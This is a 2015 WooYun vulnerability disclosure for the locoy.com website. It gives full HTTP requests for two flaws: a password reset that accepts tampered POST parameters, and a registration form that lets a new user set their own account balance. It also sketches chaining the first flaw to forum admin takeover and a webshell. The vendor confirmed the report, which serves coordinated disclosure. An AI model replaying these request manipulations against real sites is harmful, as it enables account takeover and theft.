当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0107279

漏洞标题:火车头采集器官网漏洞2枚可getwebshell

相关厂商:locoy.com

漏洞作者: 煎饼果子

提交时间:2015-04-13 11:45

修复时间:2015-05-28 13:24

公开时间:2015-05-28 13:24

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-04-13: 细节已通知厂商并且等待厂商处理中
2015-04-13: 厂商已经确认,细节仅向厂商公开
2015-04-23: 细节向核心白帽子及相关领域专家公开
2015-05-03: 细节向普通白帽子公开
2015-05-13: 细节向实习白帽子公开
2015-05-28: 细节向公众公开

简要描述:

2处代码设计问题.

详细说明:

1:任意用户密码修改 位置http://www.locoy.com/member/getpwd.php
首先注册用户.然后选择找回密码. 填入正确的用户名和此用户的注册邮箱. 系统发找回密码的URL链接至用户邮箱.
类似:http://www.locoy.com/member/getpwd.php?action=getpwd&step=4&userid=[用户ID]&authstr=[32位加密码]
此时直接发包修改POST 参数. 即可对任意用户密码进行重置.

Host: www.locoy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.locoy.com/member/getpwd.php?action=getpwd&step=4&userid=[用户ID]&authstr=[32位加密码]
Cookie: 800019423slid=slid_82_26%7C; 800019423mid=89_26; 800019423mh=1428728177141; 800019423is=2; CNZZDATA5740700=cnzz_eid%3D373330634-1426837916-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1428723746; pgv_pvi=6005643264; DlqmrLfmUGcookietime=31536000; DlqmrLfmUGusername=[隐藏内容]; cck_lasttime=1428727989957; cck_count=0; pgv_si=s563043328; PHPSESSID=n0q02n9vpmq785ilo9sfdpv447; 800019423slid=slid_409_57%7C; 800019423mid=417_16; 800019423mh=1428728161450; 800019423msg=%u60A8%u597D%uFF0C%u8FD9%u91CC%u662F%u706B%u8F66%u91C7%u96C6%u5668%u4F01%u4E1AQQ%u5BA2%u670D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u70B9%u51FB%u786E%u5B9A%u5373%u53EF%u8FDB%u884C%u804A%u5929; 800019423slid_409_57=1428728161466
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 163
name=[此处填写想改密码的用户账号]&email=[原用户邮箱]&password=[你想设置的密码]&pwdconfirm=[确认密码]&authstr=7131195707e5a8da32a54d89047fa17b&userid=[隐藏内容]&step=4&dosubmit=%CF%C2%D2%BB%B2%BD


详情见http post包. 修改POST包后.直接发包即可修改成功.

QQ截图20150411131307.jpg


2:新注册用户可以任意修改用户账号余额漏洞.
注册发包时: 新增一处parameter 即 memberinfo[amount]=10 新注册用户注册后就有了10元的余额.可以直接在商城购买最新版火车头软件.

POST /member/register.php HTTP/1.1
Host: www.locoy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.locoy.com/member/register.php
Cookie: 800019423slid=slid_740_2%7C; 800019423mid=748_34; 800019423mh=1428728833832; 800019423is=2; CNZZDATA5740700=cnzz_eid%3D373330634-1426837916-http%253A%252F%252Fwww.baidu.com%252F%26ntime%3D1428723746; pgv_pvi=6005643264; DlqmrLfmUGcookietime=31536000; DlqmrLfmUGusername=[隐藏内容]; cck_lasttime=1428727989957; cck_count=0; pgv_si=s563043328; PHPSESSID=n0q02n9vpmq785ilo9sfdpv447; 800019423slid=slid_928_54%7Cslid_592_82%7Cslid_213_92%7C; 800019423mid=214_57; 800019423mh=1428728735214; 800019423is=2; 800019423msg=%u60A8%u597D%uFF0C%u8FD9%u91CC%u662F%u706B%u8F66%u91C7%u96C6%u5668%u4F01%u4E1AQQ%u5BA2%u670D%uFF0C%u8BF7%u95EE%u6709%u4EC0%u4E48%u53EF%u4EE5%u5E2E%u5230%u60A8%uFF1F%u70B9%u51FB%u786E%u5B9A%u5373%u53EF%u8FDB%u884C%u804A%u5929
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 246
memberinfo%5Busername%5D=[隐藏内容]&memberinfo%5Bpassword%5D=123123&pwdconfirm=123123&memberinfo%5Bemail%5D=[隐藏内容]&checkcodestr=undeemed&memberinfo%5Bmodelid%5D=[此处任意填写金额]&memberinfo%5bamount%5d=10&regagreement=1&action=register&dosubmit=++%D7%A2++%B2%E1++&vundeemed=undeemed


20150411130824.png


根据第一个任意密码修改漏洞,可以在bbs.locoy.com 里面找到几个管理员的账号 ,重置他们的密码.即可登录discuz 3.2 后台.
然后getwebshell....主站和BBS在同一服务器上.然后就没有然后了....

漏洞证明:

QQ截图20150411131955.jpg


QQ截图20150411131830.jpg


修复方案:

你们比我专业.

版权声明:转载请注明来源 煎饼果子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-04-13 13:22

厂商回复:

感谢。

最新状态:

暂无